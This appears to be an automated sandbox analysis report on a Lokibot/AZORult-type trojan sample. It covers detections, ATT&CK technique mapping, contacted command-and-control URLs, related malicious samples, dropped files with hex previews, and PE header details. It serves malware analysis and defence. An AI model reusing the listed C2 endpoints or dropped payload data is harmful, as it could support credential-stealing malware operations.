Source: C:\Windows\SysWOW64\svchost.exe	Code function: SmtpPassword		2_2_0040D069

Source: PRI_VTK250419A.exe	Binary or memory string: WIN_81
Source: PRI_VTK250419A.exe	Binary or memory string: WIN_XP
Source: PRI_VTK250419A.exe	Binary or memory string: WIN_XPe
Source: PRI_VTK250419A.exe	Binary or memory string: WIN_VISTA
Source: PRI_VTK250419A.exe	Binary or memory string: WIN_7
Source: PRI_VTK250419A.exe	Binary or memory string: WIN_8
Source: PRI_VTK250419A.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C46283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_00C46283
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C46747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00C46747
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00196BB0 RpcServerUnregisterIfEx,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	2_2_00196BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00196AF0 EnterCriticalSection,RpcServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	2_2_00196AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00196B60 RpcServerUnregisterIf,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	2_2_00196B60

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Service Execution	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	3 Windows Service	2 Valid Accounts	2 Obfuscated Files or Information	2 Credentials in Registry	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	117 System Information Discovery	Distributed Component Object Model	21 Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	3 Windows Service	1 Masquerading	LSA Secrets	231 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	312 Process Injection	2 Valid Accounts	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PRI_VTK250419A.exe	51%	Virustotal		Browse
PRI_VTK250419A.exe	55%	ReversingLabs	Win32.Trojan.AZORult

Source	Detection	Scanner	Label	Link
http://touxzw.ir/scc1/five/fre.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
touxzw.ir	104.21.80.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://touxzw.ir/scc1/five/fre.php	true	Avira URL Cloud: malware	unknown
http://kbfvzoboss.bid/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
http://alphastand.top/alien/fre.php	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ibsensoftware.com/	svchost.exe, svchost.exe, 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.80.1	touxzw.ir	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1623793
Start date and time:	2025-02-25 15:36:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PRI_VTK250419A.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/6@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 54 Number of non-executed functions: 280
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.60
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:37:06	API Interceptor	61x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.80.1	dfiCWCanbj.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
	laser (2).ps1	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	laser.ps1	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/k566/
	QUOTATION REQUEST.exe	Get hash	malicious	FormBook	Browse	www.shlomi.app/t3l4/
	Quotation.exe	Get hash	malicious	FormBook	Browse	www.askvtwv8.top/uztg/
	SFT20020117.exe	Get hash	malicious	FormBook	Browse	www.fz977.xyz/7p42/
	PO #86637.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/mquw/
	ed.ps1	Get hash	malicious	FormBook	Browse	www.arryongro-nambe.live/x0gh/
	Updated Price List for 2025 Business Year.exe	Get hash	malicious	FormBook	Browse	www.sigaque.today/7c9r/
	Updated Price List for 2025 Business Year.exe	Get hash	malicious	FormBook	Browse	www.sigaque.today/7c9r/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
touxzw.ir	7RryusxiMtHBz80.exe	Get hash	malicious	Lokibot	Browse	104.21.64.1
	PO.exe	Get hash	malicious	Lokibot	Browse	104.21.96.1
	OEoRzjI7JgSiUUd.exe	Get hash	malicious	Lokibot	Browse	104.21.96.1
	Shipment Delivery No DE0093002-PDF.exe	Get hash	malicious	Lokibot	Browse	104.21.48.1
	Remittance_CT022024.exe	Get hash	malicious	Lokibot	Browse	104.21.48.1
	dfiCWCanbj.exe	Get hash	malicious	Lokibot	Browse	104.21.80.1
	Request for quotation -6001845515-XLSX.exe	Get hash	malicious	Lokibot	Browse	104.21.64.1
	vsf098633534.exe	Get hash	malicious	Lokibot	Browse	104.21.64.1
	scan_0219025_pdf.exe	Get hash	malicious	Lokibot	Browse	104.21.112.1
	scan_07022025_pdf.exe	Get hash	malicious	DarkTortilla, Lokibot	Browse	104.21.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://ancient.anguish.org/cgi-bin/tms.cgi?https://xero-invoice.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	172.67.167.95
	https://login.case.edu/cas/login?gateway=true&service=https%3A%2F%2Fassets-usa.mkt.dynamics.com/073116b7-d9ed-ef11-933d-6045bd027c35/digitalassets/standaloneforms/f762be82-c9f2-ef11-9342-000d3a59dfbe	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	104.16.2.189
	https://www.icco.org/statistics/	Get hash	malicious	Unknown	Browse	1.1.1.1
	Zitat Nr. 46789Feb25..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	https://haytts.net/index.html#eosborn@virginiahospitalcenter.com	Get hash	malicious	Unknown	Browse	104.18.95.41
	v0RrPngACMSOrIs.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.48.1
	https://atpscan.global.hornetsecurity.com/?d=eqOz7AXSzN2V2mi6iPmcWAtgYiZy7lkNff2rdLiYxLc&f=uieQKeFt6Zo7ANK8iLoZFPTujO3kkK4boT32m0sSAem2yjB3nbrJPC-bjAvICoGvUsBPae9KnS3shx7u3k2FiwwIqyiK3sQzLKFz5y8q_nj8PAt_J9HmT1bo5p4OIPC1eZYzpGJBfTb7UM-l94hwhA&i=&k=WFad&m=2x6lr8WIArfjoki1cLDoaGvtZnic1YOh--dHqhZnxNrDJUG4m82-vM5qXqDCSAsURkVh0fd5KOJuBllo3N6JKs2ra2-P7_2temJ9tYhs2hxglgVJVr5gYlT_yoYeRZjF&n=GP4DG9iGvMhGp7Cc0MfzdFVrVHv5htxygQbtVpxMJpUIBpkiFZSL5KiAfQBsE-KAVBPk5S1ARYk-3VQUbSVQ7A&r=WVGLAKs8L0Zh9eoU1fbnSHa5iJ0XuA-IG_TRldcDEATEV5Ai8mKQZHV2Y3yODQ5K&s=49438b7fe2a6d5a79aafcc5ab0730c0b326ba1d8858947a63aac81e1e9547b97&u=https%3A%2F%2Faws.predictiveresponse.net%2Ffwdhs.htm%3Fredirect%3D%2F%2FmembersGelita.cpmeduca.com.br	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	104.17.25.14
	https://drive.usercontent.google.com/u/0/uc?id=1JmlOFU9xF5LP0XvS6hM5KS6X8cSifM5-&export=download	Get hash	malicious	Unknown	Browse	188.114.96.3
	Tmu6xSTr7o.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	Balance Pendiente.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.48.1

Process:	C:\Users\user\Desktop\PRI_VTK250419A.exe
File Type:	data
Category:	dropped
Size (bytes):	82840
Entropy (8bit):	7.95528189022658
Encrypted:	false
SSDEEP:	1536:xoL+mlx1bE6KydAm7RK7mhZXBVNuUBOHKjXRG6rqe/3WhXrIYZlpd:xUlEVyeKKihKuRG6+e/WdrISpd
MD5:	6FDC70A1639CEC00A3CCB521AD290A84
SHA1:	0B9A0DE61171D283EDF362DA91636B58CA71C76D
SHA-256:	6BA06F8479B8833147F095C8FBA52CCA9705846313B76A33D7CF46E1E481E2B8
SHA-512:	96955DD351180E82E07D424BFCC69C6C97BC4625C65E8BC4C1BB801E78899E9A61590020550D50FBA8651B68A6ACCD76BF8ADD13F8216AE2115C6C1A6B150D30
Malicious:	false
Reputation:	low
Preview:	EA06.....Gy4:..sL.Q(S...L....=..G........X..it...k .....X...4.....}&..\|B;%.O.s.$.A4.J.2....#.Y$.KL.}"......&!g.K&....sN..,g5...9~......w...s...x{^j....z.~.7.i..yy....~.y...........\..9...\|=.5....U}]..W..H.7......Q\|...?..., R...a...^.C..hUJ..X..nkmM.Q..j...}.S&.jP......z......y.J%.B.,S.t..6...Uh....[h4.8.{...C.9.I..1L.....LP.M;..U.0..........cUzll...Lk.J.......:...~.Q.4p...M...Y.I$...@.b:.XB......c...p..M2....H..4.P.4.x..4..M\|.).'.e..Bf..,..K ....c\|x@...t.[....Bm..0......J.9..(.....9.T..M..uQ...........f.O]0...Q.....q1.O...]&....t_.0.`..(.N`..L..h...R.G............:m6.L.....L.......1.Q~u....C._....@.`..,b..T........!4K..0..)`....C.V`u.-.....n..}2.J.Sh._....~..K...I...._....y....u..7.i.[..T..~...].. ...j..<v.tjM.....h..v..$Qh\zU;'..qh..F&..<.k.i.'e>.....W....^q`........:5............it.d....U..z.+.]..&.L(..[..9.z...C..$4....0..v.../+....m........}.......>....;[.....Q....i..P.S..7yF.W.......i../J...A._.(.....7..2.H....4...q{...Y..xm4.

C:\Users\user\AppData\Local\Temp\autCDF5.tmp

Download File

Process:	C:\Users\user\Desktop\PRI_VTK250419A.exe
File Type:	data
Category:	dropped
Size (bytes):	9646
Entropy (8bit):	7.604304919387108
Encrypted:	false
SSDEEP:	192:c09SJLZ7jNO7shMZLo2rfGUBd1fbLeZxMGSbpk5jHIdy41oZ/FHEb2BgNDQ+3xgL:X9SJtjMM2Tl1fOcIhHIcd/E6A8+3xy
MD5:	82FDCF98349AB0316CFE3D27F7A76C92
SHA1:	5C84426FD80E51A05D08D9E93010CD5D9AB8723E
SHA-256:	F2C874BD35734D77F59C48A394B0164DA1808E124EBCAE51B6651816541148FF
SHA-512:	1613E74DD3AF2EA78418646ABC81663CB02FD3381F7B6C0A1D53BB54E99CEE72C4D3C80E176E762B0A354B950E24E0B5AFC90F606E719A7D711943ACCB72E07C
Malicious:	false
Reputation:	low
Preview:	EA06..p..L&.[...e....;..`....y...b.......s8..&...j.%.$.m8..Sp.N.g.....m.X@..K...c.$....lL.`..Ng6)...l.I...b....4..,S@..l.l.-z..f.6\|v...Qc.0.......q4.Y..k..h......c ._..p.1....qa.H....9..$l.3..Y@.6...$.a5.H.f@.....\|3....fs9..%d.M...5...&.@.@.K.I.....Y.x>9.....Y.j.;.......j.;-....Y@j.9.....K,..1...'.`....\|.....,S`..N,`...H.......\|....F. ,_...c3..........;..:&.>_L.n....f.G_T......\|.).......&.....8...&V....ia...=.....Y......&..`.l..\|.[.....Yl ....ab...,@....ib........h.._..@...3\|.P.o.ac.....+.....N.i\|sk....8..4\|.0...c....7....k ..7.X..TD....M&`....g....,,`....>.Y...$.@&....L&.P.....32.\|&.G%......h...,..33.%.....BS...Nf......f.4.L,.9."....Bvp.Y...ffS{$..d..,.@8@.......@.3d.L..k4.h..M.B:.Y...fg6.;.ab....98.L..:.....of.L.*..Fp........36.Y&.k,.b...' !...,t.33.4.c2.X.M....#......j.d...[..%3.....c....M'6...ic....!..,..3 k..p....@...L&..........., ....#......f.8.X..K..`....zn........0{.k7....!..,...S.%..9..J@^@.G'.......aa.M..)LM@B:.Y...ffS...r....@...N@.:.....n..Mf@....

C:\Users\user\AppData\Local\Temp\spado

Download File

Process:	C:\Users\user\Desktop\PRI_VTK250419A.exe
File Type:	data
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	7.496696018320788
Encrypted:	false
SSDEEP:	1536:kGhVbKZynVmPpCWT6pLzzuISpEpoqOtTnasXZuBv2GdixEENwWxPx+pk+4:VhVWZiqpCWX7ElGFZurdixEVWpIk+4
MD5:	666952A40C6A34A919BD6C5A5D526235
SHA1:	8D53C9D228B1A9C98C76C46D4F6FFFEA3B3776DF
SHA-256:	19332B005E5EE8BD04859FB9D5DE476E03A1EA5C024F72E6BD044343A192B900
SHA-512:	993F6EB6D9D01FFA9F6054131558A1EA37A616FBDD81FCCF6B7CADDA76C681BBCEB12197493B79CCBBF7DF6B88FB98831E45534589F4B2F77DAD44FE7AE391F1
Malicious:	false
Reputation:	low
Preview:	...CSE9L0DB1..KL.JVMGFCG.CPE9L4DB1IMKLSJVMGFCGYCPE9L4DB1IMKL.JVMIY.IY.Y...5....%"?s:$" 4"*y 1+W#@d Ti?>"s#8m...g4,4 .A9Nf1IMKLSJ..?...O.../..T......@.......F..-.._.v~....Q...O.../.....]...A...U....."......E.k.....O..,Z$..T.IMKLSJVM..CG.BTE.DX.B1IMKLSJ.MDGHFUCP}8L4.J1IMKL.sWMGVCGY.QE9LtDB!IMKNSJSMFFCGYCUE8L4DB1ImALSNVMGFCG[CP.9L$DB!IMKLCJV]GFCGYC@E9L4DB1IMKL..WM#FCGYCPE9L4DB1IMKLSJVMGFCGYCPE9L4DB1IMKLSJVMGFCGYCPE9L4DB1IMKLSJVMGFCGYCPE9L4DB1IMKLS.WM.FCGYCPE9L4DB1IMKLSJVMGFCGYC~1\4@DB1.{JLSZVMG~BGYGPE9L4DB1IMKLSJvMG&m5="$$9LT.B1I.JLS.VMGzBGYCPE9L4DB1IM.LS.x)&2"GYCt.1L4.C1IOKLS4WMGFCGYCPE9L4D.1I.e4SJVMGFCgYCPE3L4dB1I.JLSJVMGFCGYCPE9L4.B1IMKLSJVMGFCGYCPE9L4DB1IMKLSJVMGFCGYCPE9L4DB1IMKLSJVMGFCGYCPE9L4DB1IMKLSJVMGFCGYCPE9L4DB1IMKLSJVMGFCGYCPE9L4DB1IMKLSJVMGFCGYCPE9L4DB1IMKLSJVMGFCGYCPE9L4DB1IMKLSJVMGFCGYCPE9L4DB1IMKLSJVMGFCGYCPE9L4DB1IMKLSJVMGFCGYCPE9L4DB1IMKLSJVMGFCGYCPE9L4DB1IMKLSJVMGFCGYCPE9L4DB1IMKLSJVMGFCGYCPE9L4DB1IMKLSJVMGFCGYCPE9L4DB1IMKLSJVMGFCGYCPE9L4DB1IMKLSJVMGFCGYCPE9L4D

C:\Users\user\AppData\Local\Temp\untraumatic

Download File

Process:	C:\Users\user\Desktop\PRI_VTK250419A.exe
File Type:	ASCII text, with very long lines (28674), with no line terminators
Category:	dropped
Size (bytes):	28674
Entropy (8bit):	3.5775786090396013
Encrypted:	false
SSDEEP:	768:G3i/5IPbFVvkb7OgoLwp5JF6xVLmql1ffnu1uLphM:UiBIPb7o7OZcuLDM
MD5:	152305868BDC902122AE9961CA7E973C
SHA1:	68E47EA3C15CF2F3C20229CD5361B091719685BA
SHA-256:	71B86C22172557AE24413705501DC2FDFCF68947AF60945F7AAC2F07BB055DB4
SHA-512:	AFB7D809F549BB5AA320CDAEBDCE396652F2BD8FA81039AC55E67CD88C66DB8EB38F975441CDF6A6546B912A359B0CBFA1242DF3F60E0EBE5BDBDC7A3A0D6BEF
Malicious:	false
Reputation:	low
Preview:	x055b8ce18cecc20000065758bb6000000669854489b560000006698d468ab27000000669855888be6000000669854a89b560000006698d4c8abc6000000669855e88b33000000669854099b230000006698d429abe2000000669855498b46000000669854699bc60000006698d489abc6000000669855a9330c669854c99be60000006698d844ffffffab4700000066985964ffffff8b4600000066985884ffffff9bc60000006698d8a4ffffffabc6000000669859c4ffffff8be2000000669858e4ffffff9b460000006698d805ffffffabc600000066985925ffffff8bc600000066985845ffffff339c6698d865ffffffab570000006698550d8b370000006698542d9b560000006698d44dab270000006698556d8b330000006698548d9b230000006698d4adabe2000000669855cd8b46000000669854ed9bc60000006698d40eabc60000006698552e330c6698544e9b160000006698d886ffffffab46000000669859a6ffffff8b67000000669858c6ffffff9b160000006698d8e6ffffffab0700000066985907ffffff8b9600000066985827ffffff9b330000006698d847ffffffab2300000066985967ffffff8be200000066985887ffffff9b460000006698d8a7ffffffabc6000000669859c7ffffff8bc6000000669858e7ffffff339c6698d408ab370000006698550a8b86

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	1.168829563685559
Encrypted:	false
SSDEEP:	3:/lSll2DQi:AoMi
MD5:	DAB633BEBCCE13575989DCFA4E2203D6
SHA1:	33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
SHA-256:	1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
SHA-512:	EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.850430927311049
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PRI_VTK250419A.exe
File size:	967'168 bytes
MD5:	d45ab46d87bb599ccc62569c10d2d323
SHA1:	d7010744a6dc830a79406b04ce281c7b60cc531a
SHA256:	f29f7c7516de91fc3d8e1d6c23590cc5c73a9123176cd6b742c8d5c23d5da9f5
SHA512:	7abb34238334e294e8d13e1bc90db54fafa1b151738da434412625e8808dfe633449c780a98112b70b2520c572d5aa5e8501507f24fbb2ffdc02f92b0c8cb5bf
SSDEEP:	24576:Du6J33O0c+JY5UZ+XC0kGso6Fam9GwLqWY:Nu0c++OCvkGs9Fam9Gw1Y
TLSH:	6D25AE2273DDC360CB669173BF69B7016EBF7C610630B95B2F880D7DA950162262D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67BBCF38 [Mon Feb 24 01:45:28 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F9E544D625Ah
jmp 00007F9E544C9024h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F9E544C91AAh
cmp edi, eax
jc 00007F9E544C950Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F9E544C91A9h
rep movsb
jmp 00007F9E544C94BCh
cmp ecx, 00000080h
jc 00007F9E544C9374h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F9E544C91B0h
bt dword ptr [004BE324h], 01h
jc 00007F9E544C9680h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F9E544C934Dh
test edi, 00000003h
jne 00007F9E544C935Eh
test esi, 00000003h
jne 00007F9E544C933Dh
bt edi, 02h
jnc 00007F9E544C91AFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F9E544C91B3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F9E544C9205h
bt esi, 03h
jnc 00007F9E544C9258h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x2386c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xeb000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x2386c	0x23a00	87f3117438b0c68a5d87bd37fe19b77b	False	0.8131167763157895	data	7.581440406379903	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xeb000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
